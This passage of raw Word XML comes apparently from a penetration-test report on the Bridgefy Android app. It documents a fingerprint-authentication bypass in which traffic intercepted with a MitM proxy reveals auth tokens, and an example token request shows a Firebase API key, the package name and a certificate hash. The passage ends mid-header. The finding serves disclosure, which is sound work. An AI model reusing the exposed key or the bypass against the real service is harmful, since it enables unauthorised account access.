        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>already,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>showing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the fingerprint must be entered (do not enter the fingerprint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Intercept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Request/Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="54"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(i.e.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Fiddler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reveals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>despite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not being entered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="2367" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/v1/token?key=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AIzaSyB8VIwqxpf79NhC27fMLsiJvxazGeumAWU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Android-Package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>me.bridgefy.main.staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Android-Cert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BD13A96EEE31F3B15DDCB6E25A2CA6481DF8AF5D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Accept-Language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: en-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2565" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Client-Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Android/Fallback/X21000008/FirebaseCore-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Android </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Firebase-GMPID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 1:1052189342245:android:4192b7572c4fb331e89dcc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Firebase-Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>H4sIAAAAAAAAAKtWykhNLCpJSk0sKVayio7VUSpLLSrOzM9TslIyUqoFAFyivEQfAAAA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 315</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Dalvik/2.1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(Linux;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>U;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
